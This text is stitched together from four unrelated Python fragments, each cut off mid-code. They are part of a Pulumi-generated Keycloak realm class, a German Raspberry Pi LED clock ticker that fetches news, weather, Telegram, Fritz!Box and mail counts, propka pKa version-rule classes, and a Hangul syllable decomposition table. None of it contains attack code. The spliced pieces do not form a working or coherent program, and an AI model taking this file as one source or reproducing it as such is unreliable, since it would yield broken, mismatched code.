Enable events recording TODO: change to values and use kubebuilder default annotation once supported
"""
return pulumi.get(self, "events_enabled")
@property
@pulumi.getter(name="eventsListeners")
def events_listeners(self) -> Optional[Sequence[str]]:
"""
A set of Event Listeners.
"""
return pulumi.get(self, "events_listeners")
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter(name="identityProviders")
def identity_providers(self) -> Optional[Sequence['outputs.KeycloakRealmSpecRealmIdentityProviders']]:
"""
A set of Identity Providers.
"""
return pulumi.get(self, "identity_providers")
@property
@pulumi.getter
def users(self) -> Optional[Sequence['outputs.KeycloakRealmSpecRealmUsers']]:
"""
A set of Keycloak Users.
"""
return pulumi.get(self, "users")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KeycloakRealmSpecRealmClients(dict):
def __init__(__self__, *,
client_id: str,
access: Optional[Mapping[str, bool]] = None,
admin_url: Optional[str] = None,
attributes: Optional[Mapping[str, str]] = None,
base_url: Optional[str] = None,
bearer_only: Optional[bool] = None,
client_authenticator_type: Optional[str] = None,
consent_required: Optional[bool] = None,
default_roles: Optional[Sequence[str]] = None,
description: Optional[str] = None,
direct_access_grants_enabled: Optional[bool] = None,
enabled: Optional[bool] = None,
frontchannel_logout: Optional[bool] = None,
full_scope_allowed: Optional[bool] = None,
id: Optional[str] = None,
implicit_flow_enabled: Optional[bool] = None,
name: Optional[str] = None,
node_re_registration_timeout: Optional[int] = None,
not_before: Optional[int] = None,
protocol: Optional[str] = None,
protocol_mappers: Optional[Sequence['outputs.KeycloakRealmSpecRealmClientsProtocolMappers']] = None,
public_client: Optional[bool] = None,
redirect_uris: Optional[Sequence[str]] = None,
root_url: Optional[str] = None,
secret: Optional[str] = None,
service_accounts_enabled: Optional[bool] = None,
standard_flow_enabled: Optional[bool] = None,
surrogate_auth_required: Optional[bool] = None,
use_template_config: Optional[bool] = None,
use_template_mappers: Optional[bool] = None,
use_template_scope: Optional[bool] = None,
web_origins: Optional[Sequence[str]] = None):
"""
:param str client_id: Client ID.
:param Mapping[str, bool] access: Access options.
:param str admin_url: Application Admin URL.
:param Mapping[str, str] attributes: Client Attributes.
:param str base_url: Application base URL.
:param bool bearer_only: True if a client supports only Bearer Tokens.
:param str client_authenticator_type: What Client authentication type to use.
:param bool consent_required: True if Consent Screen is required.
:param Sequence[str] default_roles: Default Client roles.
:param str description: Client description.
:param bool direct_access_grants_enabled: True if Direct Grant is enabled.
:param bool enabled: Client enabled flag.
:param bool frontchannel_logout: True if this client supports Front Channel logout.
:param bool full_scope_allowed: True if Full Scope is allowed.
:param str id: Client ID. If not specified, automatically generated.
:param bool implicit_flow_enabled: True if Implicit flow is enabled.
:param str name: Client name.
:param int node_re_registration_timeout: Node registration timeout.
:param int not_before: Not Before setting.
:param str protocol: Protocol used for this Client.
:param Sequence['KeycloakRealmSpecRealmClientsProtocolMappersArgs'] protocol_mappers: Protocol Mappers.
:param bool public_client: True if this is a public Client.
:param Sequence[str] redirect_uris: A list of valid Redirection URLs.
:param str root_url: Application root URL.
:param str secret: Client Secret. The Operator will automatically create a Secret based on this value.
:param bool service_accounts_enabled: True if Service Accounts are enabled.
:param bool standard_flow_enabled: True if Standard flow is enabled.
:param bool surrogate_auth_required: Surrogate Authentication Required option.
:param bool use_template_config: True to use a Template Config.
:param bool use_template_mappers: True to use Template Mappers.
:param bool use_template_scope: True to use Template | |
#!/usr/bin/env python3
# RollingClockTicker by joe703 / https://www.youtube.com/channel/UChMi8gAr52_jZXIpr9WXYQQ
# Verbesserungen und Erweiterungen von Mario
import time
import socket
import feedparser
import requests
import RollingClock
import sys, signal
import imaplib
from fritzconnection.lib.fritzcall import FritzCall # pip3 install fritzconnection
import json, urllib.request
from re import sub
from datetime import date, datetime
import RPi.GPIO as GPIO
global OFFSET, WeatherNewsAPIKey, TelegramAPIKey, WheatherNewsCity
OFFSET = 0
def time_in_range(start, end, x):
if start <= end:
return start <= x <= end
else:
return start <= x or x <= end
def signal_handler(signal, stackframe):
Uhr.Hide()
ClockHide= True
ClockStop= True
Uhr.close()
print("Stop der Uhr angefordert")
Uhr.join()
print("Uhr gestoppt")
sys.exit()
def ReadYoutubeSubscriberCounter():
try:
url = "https://www.googleapis.com/youtube/v3/channels?part=statistics&id=___YOUTUBE-KANAL-ID___&key=___GOOGLE-API-KEY___"
res = urllib.request.urlopen(url).read().decode('utf-8')
data = json.loads(res)
SubscriberText = data['items'][0]['statistics']['subscriberCount']
except:
SubscriberText = "???"
return "Mario's Kanal: " + SubscriberText + " Abonnenten"
def ReadNews():
try:
NewsFeed = feedparser.parse("https://www.tagesschau.de/xml/rss2_https/")
NewsText = NewsFeed.entries[0].title+": "+NewsFeed.entries[0].content[1].value
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
NewsText = NewsText.replace(char,chars[char])
except:
NewsText = "Keine Tagesschau News ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', NewsText)
def ITNews():
try:
ITFeed = feedparser.parse("https://www.heise.de/rss/heise-Rubrik-IT.rdf")
ITText = ITFeed.entries[0].title+": "+ITFeed.entries[0].description
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
ITText = ITText.replace(char,chars[char])
except:
ITText = "Keine Heise IT News ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', ITText)
def MobileNews():
try:
MobileFeed = feedparser.parse("https://www.heise.de/rss/heise-Rubrik-Mobiles.rdf")
MobileText = MobileFeed.entries[0].title+": "+MobileFeed.entries[0].description
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
MobileText = MobileText.replace(char,chars[char])
except:
MobileText = "Keine Heise Mobile News ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', MobileText)
def BoersenNews():
try:
BoersenFeed = feedparser.parse("https://www.finanztreff.de/rdf_news_category-marktberichte.rss")
BoersenText = BoersenFeed.entries[0].title
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
BoersenText = BoersenText.replace(char,chars[char])
except:
BoersenText = "Keine Boersennews ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', '', BoersenText)
def WetterNews(): # Daten von OpenWeatherMAP holen
try:
API_KEY = WeatherNewsAPIKey # API Key von OpenWheaterMAP
city = WheatherNewsCity # gewünschte Stadt
url = f'https://api.openweathermap.org/data/2.5/weather?q={city}&appid={API_KEY}&units=metric'
data = requests.get(url).json()
temp = int(float(data['main']['temp'])) # aktuelle Temperatur
humidity = data['main']['humidity'] # aktuelle Luftfeuchtigkeit
wspeed = int(float(data['wind']['speed'])*3.6) # aktuelle Windgeschwindigkeit in km/h
airpress = int(float(data['main']['pressure'])) # aktueller Luftdruck
sunrise = data['sys']['sunrise'] # Sonnenaufgang
sunset = data['sys']['sunset'] # Sonnenuntergang
sunrise = datetime.fromtimestamp(sunrise).strftime('%H:%M') # Sonnenaufgang formatiert (locale Time)
sunset = datetime.fromtimestamp(sunset).strftime('%H:%M') # Sonnenuntergang formatiert (locale Time)
#sunrise = datetime.utcfromtimestamp(sunrise).strftime('%H:%M')+ " Uhr" # Sonnenaufgang formatiert (UTC Time)
#sunset = datetime.utcfromtimestamp(sunset).strftime('%H:%M')+ " Uhr" # Sonnenuntergang formatiert (UTC Time)
for i in data['weather']:
dsky = i['description'] # aktuelle Situaltion (z.Bsp. Regen, Nebel, Wolken)
wid = i['id'] # aktuelle Wetter ID
if dsky != "mist" and wid != "701":
break # nach 1. Description abbrechen falls mehrere vorhanden sind
if dsky == "scattered clouds" or dsky == "clear sky":
mc = "high" # LED-Matrix Kontrast hoch
else:
mc = "low" # LED-Matrix Kontrast niedrig
WetterText = f'Aktuelle Wetterdaten fuer {city}: Temperatur: {dsky} bei {temp} Grad - Luftfeuchte: {humidity} % - Luftdruck: {airpress} hPa - Wind: {wspeed} km/h - Sonnenaufgang: {sunrise} Uhr - Sonnenuntergang: {sunset} Uhr'
chars = {'broken clouds':'aufgelockert bewoelkt',
'few clouds':'leicht bewoelkt',
'clear sky':'klarer Himmel',
'light rain':'leichter Regen',
'overcast clouds':'bedeckter Himmel',
'fog':'Nebel',
'rain':'Regen',
'heavy intensity rain':'starker Regen',
'moderate rain':'leichter Regen',
'scattered clouds':'vereinzelt Wolken'} # Englische Angaben ins deutsche Übersetzen (eventuell noch erweitern)
for char in chars:
WetterText = WetterText.replace(char,chars[char])
except:
WetterText = "Wetterdaten deaktiviert!"
mc = "low" # LED-Matrix Kontrast niedrig
sunrise = "06:00" # Sonnenaufgang im Fehlerfall oder wenn Wetterdaten deaktiviert
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', WetterText), mc, sunrise
def BadWeatherNews(URL): # https://wettwarn.de/wettwarn_wetterwarnungen/warnregion_waehlen/
try:
BadWeatherNewsFeed = feedparser.parse(URL)
BadWeatherNewsText = BadWeatherNewsFeed.entries[0].title
chars = {'ö':'oe','ä':'ae','ü':'ue','Ö':'Oe','Ä':'Ae','Ü':'Ue','ß':'ss','–':'-',' ':' ','§':'Paragraph'}
for char in chars:
BadWeatherNewsText = BadWeatherNewsText.replace(char,chars[char])
if BadWeatherNewsText == "Keine Warnungen":
BadWeatherNewsText = "DWD WETTERWARNUNG: Keine Warnungen"
if BadWeatherNewsText.startswith("DWD WETTERWARNUNG:"):
BadWeatherNewsText = BadWeatherNewsText.replace("DWD WETTERWARNUNG:", "Achtung Unwetterwarnung:")
except:
BadWeatherNewsText = "Keine Unwetterwarnungen ???"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', '', BadWeatherNewsText)
def FritzBoxMissedCallCount(IP,FB_Password):
try:
fc = FritzCall(address=IP, password=FB_Password)
calls = fc.get_missed_calls(update=True, num=None, days=1) # Liste der verpassten Anrufe von heute und gestern
# calls = fc.get_missed_calls(update=True, num=None, days=None) # Liste aller verpassten Anrufe
CallCount = 0
for call in calls:
CallCount = CallCount +1
except:
CallCount = -1
return CallCount
def UnreadMailCount(Servername, UserName, Password):
try:
mail = imaplib.IMAP4_SSL(Servername)
mail.login(UserName, Password)
mail.select("inbox", True) # connect to inbox.
return_code, mail_ids = mail.search(None, 'UnSeen')
count = len(mail_ids[0].split())
except:
count = -1
return count
def TelegramNews(): # Daten von Chat-App "Telegram" holen und Anzeigen
try:
botToken = TelegramAPIKey # "BOT-Token" des erstellten BOT's
url = f'http://api.telegram.org/bot' + botToken + '/getUpdates'
update_raw = requests.get(url + "?offset=" + str(OFFSET))
update = update_raw.json()
num_updates = len(update["result"])
last_update = num_updates - 1
TelegramText = update['result'][last_update]['message']['text']
except:
TelegramText = "Telegram Nachrichten deaktiviert!"
return sub('[^abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890()?=/.%&:!, -]', ' ', TelegramText) # Telegramtext zurückgeben
def IsOnline():
mem1 = 0
try:
host = socket.gethostbyname("www.google.com") # Change to personal choice of site
s = socket.create_connection((host, 80), 2)
s.close()
mem2 = 1
if mem2 == mem1:
pass # Add commands to be executed on every check
else:
mem1 = mem2
#IsOnlineText = "Internet is working" # Will be executed on state change
return True
except Exception as e:
mem2 = 0
if mem2 == mem1:
pass
else:
mem1 = mem2
# IsOnlineText = "Internet is down"
return False
if __name__ == "__main__":
Wochentag =["Sonntag ", "Montag ", "Dienstag ", "Mittwoch ", "Donnerstag ", "Freitag ", "Samstag "]
# ******************************************************************************************************
# ************** Variablen mit den gewünschten Werten vorbelegen ***************************************
# ******************************************************************************************************
#----------------------------------------------------------------------------------------------------
# Ausrichtung der Uhrzeitanzeige
ClockDisplayPosition = "top" # top = oben - bottom = unten (ungleich top oder bottom = unten)
#----------------------------------------------------------------------------------------------------
# ScrollIn und ScrollOut der Anzeige festlegen
ClockScrollIn = "V" # V = Vertical H = Horizontal Default ist "V"
ClockScrollOut = "V" # V = Vertical H = Horizontal Default ist "V"
# PushButton-Setup
PushButtonGPIOPort= 21 # Pin-Nummer (nicht GPIO-Nummer) auf GPIO-Leiste gegen Ground
LongPushTime= 1 # Länge in Sekunden bis Event
PushButtonDePrell = 0.03 # Entprellzeit für den PushButton (sollte standardmäßig so bleiben) - Default = 0.03
PushButtonStatus = "NotActive" # PushButton aktivieren oder deaktivieren
# wenn PushButton nicht vorhanden "NotActive" = deaktiviert - Wenn PushButton vorhanden "Active" = aktiviert)
# Wetternews und Telegram API Schlüssel
WeatherNewsAPIKey = "<KEY>" # Hier den eigenen API Key von OpenWheaterMAP eigeben
TelegramAPIKey= "<KEY>" # Hier den "BOT-Token" des erstellten BOT's eingeben
# Stadt für WetterNews
WheatherNewsCity= "Musterstadt" # Hier die gewünschte Stadt eingeben
# RSS Feed URL für Unwetterwarnung --> hier als Beispiel Berlin
BadWeatherURL = "https://wettwarn.de/rss/bxx.rss" # hier findet Ihr eure Region oder Stadt : --> https://wettwarn.de/wettwarn_wetterwarnungen/warnregion_waehlen/
BadWeatherMode = "off" # on = Anzeige von Unwetterwarnung off = keine Anzeige von Unwetterwarnungen
# weitere Einstellungen
HideClockTimeHour = "23" # ab hier Uhr ausblenden (Stunde Uhrzeit --> ohne führende Null) --> -1 = Uhr nicht Ausblenden
ShowClockTimeHour = "6" # ab hier Uhr wieder anzeigen (Stunde Uhrzeit --> ohne führende Null)
AutoShowClock = "off" # on = Uhr Einblenden bei Sonnenaufgang - off = Uhr nur Einblenden nach bestimmter Zeit (ShowClockTimeHour)
# (Wenn "WetterNews" deaktiviert ist , dann ist AutoShowClock = "off")
DisplayContrastHigh = 16 # Voller Displaycontrast
DisplayContrastLow = 5 # geringer Displaycontrast
FullDisplayContrastHour = 12 # Ab hier vollen Displaykontrast (Stunde Uhrzeit) --> je nach Wetter wenn Wetternews aktiviert
MinDisplayContrastHourWinter = 15 # Ab hier niedriger Displaycontrast (Stunde Uhrzeit - im Winter)
MinDisplayContrastHourSummer = 19 # Ab hier niedriger Displaycontrast (Stunde Uhrzeit - im Sommer)
# Geburtstagsgruß Datum
DateOfBirth = "07.03"
HDBL = "" # Feiertags Bundesland --> keine Angabe gibt nur die bundeseinheitlichen Feiertage aus (Bundesländer siehe unten)
AlertMaxCPUTemp = 70 # Alarm-Anzeige bei Temperatur von X Grad oder höher der CPU
NewsTrigger = 15 # Nach X sekunden (von 1 Minute) - Prüfen auf vorhandene News
TriggerWeatherData = 5 # nur alle X Minuten die Wetterdaten anzeigen wenn keine Änderung
CurrentDateTimeCounter = 3 # aktuelles Datum nur alle X Minuten anzeigen
WaitTimeforOnline = 8 # Alle X sekunden "Internetstatus: Offline" anzeigen wenn keine Internetverbindung
GhostMode = "off" # on = Geist wird um Mitternacht angezeigt off = Geist wird nicht um Mitternacht angezeigt
SoundMode = "off" # on = beim | |
def checkExceptions(self, residue1, residue2):
"""
checks for exceptions for this version - using defaults
"""
exception = False
value = None
resType1 = residue1.resType
resType2 = residue2.resType
if (resType1 == "COO" and resType2 == "ARG"):
exception, value = checkCooArgException_old(residue1, residue2, version=self)
value = self.valueCooArgException
elif (resType1 == "ARG" and resType2 == "COO"):
exception, value = checkCooArgException_old(residue2, residue1, version=self)
value = self.valueCooArgException
elif (resType1 == "COO" and resType2 == "COO"):
exception, value = checkCooCooException(residue1, residue2)
value = self.valueCooCooException
elif (resType1 == "CYS" and resType2 == "CYS"):
exception, value = checkCysCysException(residue1, residue2)
elif (resType1 == "COO" and resType2 == "HIS") or \
(resType1 == "HIS" and resType2 == "COO"):
exception, value = checkCooHisException(residue1, residue2)
elif (resType1 == "CYS" and resType2 == "HIS") or \
(resType1 == "HIS" and resType2 == "CYS"):
exception, value = checkCysHisException(residue1, residue2)
else:
""" do nothing, no exception for this pair """
return exception, value
def checkCoulombPair(self, residue1, residue2, distance):
"""
Checks if this Coulomb interaction should be done - a propka2.0 hack
"""
Npair = residue1.Nmass + residue2.Nmass
do_coulomb = True
if residue1.resType in self.coulomb_list and residue2.resType in self.coulomb_list:
# distance criteria
if distance > self.coulomb_cutoff[1]:
do_coulomb = False
# famous COO-TYR exception
if (residue1.resType == "COO" and residue2.resType == "TYR") or \
(residue2.resType == "COO" and residue1.resType == "TYR"):
""" do nothing """
elif Npair < self.Nmin:
do_coulomb = False
else:
do_coulomb = False
#print "%s - %s Npair=%4d %s" % (residue1.label, residue2.label, Npair, do_coulomb)
return do_coulomb
def setCoulombCutOff(self, cutoff):
"""
sets the cutoff for calculating Coulomb interactions
"""
self.coulomb_cutoff = cutoff
def calculateSideChainEnergy(self, distance, dpka_max, cutoff, weight, f_angle):
"""
redirects to get the correct side-chain interaction
"""
if True:
prefactor = (1.0 + weight*self.scaleUpBuriedSideChain)
else:
prefactor = 1.00
return calculate.SideChainEnergy(distance, prefactor*dpka_max, cutoff, f_angle)
def calculateCoulombEnergy(self, distance, weight):
"""
redirects to get the correct Coulomb interaction - linear for default
"""
if self.CoulombModel == "Linear":
return calculate.linearCoulombEnergy(distance, weight, self, verbose=False)
elif self.CoulombModel == "Coulomb":
return calculate.CoulombEnergy(distance, weight, self, verbose=False)
else:
pka_print("Coulomb \"%s\" is not implemented" % (self.CoulombModel))
sys.exit(8)
def calculateCoulombWeight(self, Nmass1, Nmass2):
"""
calculates the weight for the Coulomb interaction - used for version "Dec18" & "Sep23"
"""
N_pair = Nmass1 + Nmass2
Nmin = 2*self.Nmin
Nmax = 2*self.Nmax
weight = float(N_pair - Nmin)/float(Nmax - Nmin)
weight = min(1.0, weight)
weight = max(0.0, weight)
return weight
# --- specific versions with different behaviour or initialization ---
class Jan01(Version):
"""
This is a test to set up rules for different propka Jan15 version
"""
def __init__(self, verbose=True):
"""
Rules of action for version Jan01
"""
Version.__init__(self, verbose=False)
self.name = "Jan01"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 300
self.Nmax = 600
self.buried_cutoff = 15.50
self.desolv_cutoff = 15.50
self.setDesolvation("propka2")
self.setCoulomb("Linear", cutoff=[4.0, 7.0], diel=None, scaled_diel=None, scaled=False)
self.doingBackBoneReorganization = False
def checkCoulombPair(self, residue1, residue2, distance):
"""
Checks if this Coulomb interaction should be done - a propka2.0 hack
"""
do_coulomb = True
# check all Coulomb criteria!
if residue1.resType in self.coulomb_list and residue2.resType in self.coulomb_list:
# distance criteria
if distance > self.coulomb_cutoff[1]:
do_coulomb = False
# famous COO-TYR exception
if (residue1.resType == "COO" and residue2.resType == "TYR") or \
(residue2.resType == "COO" and residue1.resType == "TYR"):
""" do nothing """
elif lib.checkBuried(residue1.Nmass, residue2.Nmass) == False:
do_coulomb = False
else:
do_coulomb = False
return do_coulomb
def calculateCoulombWeight(self, Nmass1, Nmass2):
"""
calculates the weight for the Coulomb interaction - used for version "Dec18" & "Sep23"
"""
if lib.checkBuried(Nmass1, Nmass2) == False:
return 0.0
else:
return 1.0
class Oct13(Version):
"""
To test ligand integration
"""
def __init__(self, verbose=True):
"""
Rules of action for version Oct13, based on Sep07
"""
Version.__init__(self, verbose=False)
self.name = "Oct13"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 280
self.Nmax = 560
self.buried_cutoff = 15.00
self.desolv_cutoff = 20.00
self.setDesolvation("VolumeModel", prefactor=-13.12, fudge=0.40, allowance=0.0, scaled=True)
self.setCoulomb("Coulomb", cutoff=[4.0, 10.0], diel=80.0, scaled_diel=True, scaled=False)
self.doingBackBoneReorganization = True
coulomb_list = ["COO", "CYS", "TYR", "HIS", "LYS", "ARG", "N+ "]
# ligand parameters
self.read_ion_parameters()
mono_atomic_ions = ['LIG']
self.pl_coulomb_list = coulomb_list+mono_atomic_ions
def read_ion_parameters(self):
""" Reads in ions.list """
self.ions = {}
self.ions_long_names = {}
file = os.path.join(os.path.dirname(__file__), 'ions.list')
if not os.path.isfile(file):
pka_print('Error: Could not find ion parameter file:',file)
exit(9)
lines = open(file,'r').readlines()
for line in lines:
words = line[:line.find('#')].split()
if len(words) == 2:
self.ions[words[0]] = int(words[1])
self.ions_long_names[words[0]] = line[line.find('#')+1:-1]
return
def getQ(self, resName):
"""
Returns a residue charge
"""
Q = {'C- ':-1.0,
'ASP':-1.0,
'GLU':-1.0,
'CYS':-1.0,
'TYR':-1.0,
'HIS': 1.0,
'LYS': 1.0,
'ARG': 1.0,
'N+ ': 1.0}
if resName in Q:
return Q[resName]
elif resName in self.ions.keys():
return self.ions[resName]
else:
return 0.00
def resName2Type(self, resName):
"""
Expands the standard resName2Type to make sure that ion names are included
"""
resType = {'C- ': "COO",
'ASP': "COO",
'GLU': "COO",
'HIS': "HIS",
'CYS': "CYS",
'TYR': "TYR",
'LYS': "LYS",
'ARG': "ARG",
'N+ ': "N+ ",
'SER': "ROH",
'THR': "ROH",
'ASN': "AMD",
'GLN': "AMD",
'TRP': "TRP"}
if resName in resType.keys():
return resType[resName]
elif resName in self.ions.keys():
return 'LIG'
else:
return None
def checkCoulombPair(self, residue1, residue2, distance):
"""
Checks if this Coulomb interaction should be done - a propka2.0 hack
"""
do_coulomb = True
# check all Coulomb criteria!
if residue1.resType in self.pl_coulomb_list and residue2.resType in self.pl_coulomb_list:
# distance criteria
if distance > self.coulomb_cutoff[1]:
do_coulomb = False
# famous COO-TYR exception
if (residue1.resType == "COO" and residue2.resType == "TYR") or \
(residue2.resType == "COO" and residue1.resType == "TYR"):
""" do nothing """
elif lib.checkBuried(residue1.Nmass, residue2.Nmass) == False:
do_coulomb = False
else:
do_coulomb = False
return do_coulomb
class Jan15(Version):
"""
This is a test to set up rules for different propka Jan15 version
"""
def __init__(self, verbose=True):
"""
Rules of action for version Jan15
"""
Version.__init__(self, verbose=False)
self.name = "Jan15"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 300
self.Nmax = 600
self.buried_cutoff = 15.50
self.desolv_cutoff = 15.50
self.setDesolvation("ContactModel", prefactor=-0.01, allowance=400.0, scaled=False)
self.setCoulomb("Linear", cutoff=[4.0, 7.0], diel=None, scaled_diel=None, scaled=False)
self.doingBackBoneReorganization = False
def checkCoulombPair(self, residue1, residue2, distance):
"""
Checks if this Coulomb interaction should be done - a propka2.0 hack
"""
do_coulomb = True
# check all Coulomb criteria!
if residue1.resType in self.coulomb_list and residue2.resType in self.coulomb_list:
# distance criteria
if distance > self.coulomb_cutoff[1]:
do_coulomb = False
# famous COO-TYR exception
if (residue1.resType == "COO" and residue2.resType == "TYR") or \
(residue2.resType == "COO" and residue1.resType == "TYR"):
""" do nothing """
elif lib.checkBuried(residue1.Nmass, residue2.Nmass) == False:
do_coulomb = False
else:
do_coulomb = False
return do_coulomb
def calculateCoulombWeight(self, Nmass1, Nmass2):
"""
calculates the weight for the Coulomb interaction - used for version "Dec18" & "Sep23"
"""
if lib.checkBuried(Nmass1, Nmass2) == False:
return 0.0
else:
return 1.0
class May13(Version):
"""
This is a test to set up rules for different propka May13 version
"""
def __init__(self):
"""
Rules of action for version May13
"""
Version.__init__(self, verbose=False)
self.name = "May13"
self.coulomb_cutoff = 7.00
pka_print("creating propka version \"%s\"" % (self.name))
def checkExceptions(self, residue1, residue2):
"""
overwrites 'exceptions' from the default
"""
exception = False
value = 0.00
return exception, value
class Dec18(Version):
"""
This is a test to set up rules for different propka versions
"""
def __init__(self, verbose=True):
"""
Rules of action for version Dec18
"""
Version.__init__(self, verbose=False)
self.name = "Dec18"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 300
self.Nmax = 600
self.buried_cutoff = 15.50
self.desolv_cutoff = 15.50
self.setDesolvation("propka2", prefactor=-0.01, allowance=400.0, scaled=False)
self.setCoulomb("Linear", cutoff=[4.0, 7.0], diel=None, scaled_diel=None, scaled=True)
self.doingBackBoneReorganization = False
class Dec19(Version):
"""
This is a test to set up rules for different propka versions
"""
def __init__(self, verbose=True):
"""
Rules of action for version Dec19
"""
Version.__init__(self, verbose=False)
self.name = "Dec19"
if verbose == True:
pka_print("creating propka version \"%s\"" % (self.name))
self.Nmin = 300
self.Nmax = 600
self.buried_cutoff = 15.50
self.desolv_cutoff = 15.50
self.setDesolvation("ContactModel", prefactor=-0.01, allowance=400.0, scaled=False)
self.setCoulomb("Linear", cutoff=[4.0, 7.0], diel=None, scaled_diel=None, scaled=True)
self.doingBackBoneReorganization = False
class Aug24(Version):
"""
| |
4466 4535",
50405: "4362 4466 4536",
50406: "4362 4466 4537",
50407: "4362 4466 4538",
50408: "4362 4466 4539",
50409: "4362 4466 4540",
50410: "4362 4466 4541",
50411: "4362 4466 4542",
50412: "4362 4466 4543",
50413: "4362 4466 4544",
50414: "4362 4466 4545",
50415: "4362 4466 4546",
50416: "4362 4467",
50417: "4362 4467 4520",
50418: "4362 4467 4521",
50419: "4362 4467 4522",
50420: "4362 4467 4523",
50421: "4362 4467 4524",
50422: "4362 4467 4525",
50423: "4362 4467 4526",
50424: "4362 4467 4527",
50425: "4362 4467 4528",
50426: "4362 4467 4529",
50427: "4362 4467 4530",
50428: "4362 4467 4531",
50429: "4362 4467 4532",
50430: "4362 4467 4533",
50431: "4362 4467 4534",
50432: "4362 4467 4535",
50433: "4362 4467 4536",
50434: "4362 4467 4537",
50435: "4362 4467 4538",
50436: "4362 4467 4539",
50437: "4362 4467 4540",
50438: "4362 4467 4541",
50439: "4362 4467 4542",
50440: "4362 4467 4543",
50441: "4362 4467 4544",
50442: "4362 4467 4545",
50443: "4362 4467 4546",
50444: "4362 4468",
50445: "4362 4468 4520",
50446: "4362 4468 4521",
50447: "4362 4468 4522",
50448: "4362 4468 4523",
50449: "4362 4468 4524",
50450: "4362 4468 4525",
50451: "4362 4468 4526",
50452: "4362 4468 4527",
50453: "4362 4468 4528",
50454: "4362 4468 4529",
50455: "4362 4468 4530",
50456: "4362 4468 4531",
50457: "4362 4468 4532",
50458: "4362 4468 4533",
50459: "4362 4468 4534",
50460: "4362 4468 4535",
50461: "4362 4468 4536",
50462: "4362 4468 4537",
50463: "4362 4468 4538",
50464: "4362 4468 4539",
50465: "4362 4468 4540",
50466: "4362 4468 4541",
50467: "4362 4468 4542",
50468: "4362 4468 4543",
50469: "4362 4468 4544",
50470: "4362 4468 4545",
50471: "4362 4468 4546",
50472: "4362 4469",
50473: "4362 4469 4520",
50474: "4362 4469 4521",
50475: "4362 4469 4522",
50476: "4362 4469 4523",
50477: "4362 4469 4524",
50478: "4362 4469 4525",
50479: "4362 4469 4526",
50480: "4362 4469 4527",
50481: "4362 4469 4528",
50482: "4362 4469 4529",
50483: "4362 4469 4530",
50484: "4362 4469 4531",
50485: "4362 4469 4532",
50486: "4362 4469 4533",
50487: "4362 4469 4534",
50488: "4362 4469 4535",
50489: "4362 4469 4536",
50490: "4362 4469 4537",
50491: "4362 4469 4538",
50492: "4362 4469 4539",
50493: "4362 4469 4540",
50494: "4362 4469 4541",
50495: "4362 4469 4542",
50496: "4362 4469 4543",
50497: "4362 4469 4544",
50498: "4362 4469 4545",
50499: "4362 4469 4546",
50500: "4363 4449",
50501: "4363 4449 4520",
50502: "4363 4449 4521",
50503: "4363 4449 4522",
50504: "4363 4449 4523",
50505: "4363 4449 4524",
50506: "4363 4449 4525",
50507: "4363 4449 4526",
50508: "4363 4449 4527",
50509: "4363 4449 4528",
50510: "4363 4449 4529",
50511: "4363 4449 4530",
50512: "4363 4449 4531",
50513: "4363 4449 4532",
50514: "4363 4449 4533",
50515: "4363 4449 4534",
50516: "4363 4449 4535",
50517: "4363 4449 4536",
50518: "4363 4449 4537",
50519: "4363 4449 4538",
50520: "4363 4449 4539",
50521: "4363 4449 4540",
50522: "4363 4449 4541",
50523: "4363 4449 4542",
50524: "4363 4449 4543",
50525: "4363 4449 4544",
50526: "4363 4449 4545",
50527: "4363 4449 4546",
50528: "4363 4450",
50529: "4363 4450 4520",
50530: "4363 4450 4521",
50531: "4363 4450 4522",
50532: "4363 4450 4523",
50533: "4363 4450 4524",
50534: "4363 4450 4525",
50535: "4363 4450 4526",
50536: "4363 4450 4527",
50537: "4363 4450 4528",
50538: "4363 4450 4529",
50539: "4363 4450 4530",
50540: "4363 4450 4531",
50541: "4363 4450 4532",
50542: "4363 4450 4533",
50543: "4363 4450 4534",
50544: "4363 4450 4535",
50545: "4363 4450 4536",
50546: "4363 4450 4537",
50547: "4363 4450 4538",
50548: "4363 4450 4539",
50549: "4363 4450 4540",
50550: "4363 4450 4541",
50551: "4363 4450 4542",
50552: "4363 4450 4543",
50553: "4363 4450 4544",
50554: "4363 4450 4545",
50555: "4363 4450 4546",
50556: "4363 4451",
50557: "4363 4451 4520",
50558: "4363 4451 4521",
50559: "4363 4451 4522",
50560: "4363 4451 4523",
50561: "4363 4451 4524",
50562: "4363 4451 4525",
50563: "4363 4451 4526",
50564: "4363 4451 4527",
50565: "4363 4451 4528",
50566: "4363 4451 4529",
50567: "4363 4451 4530",
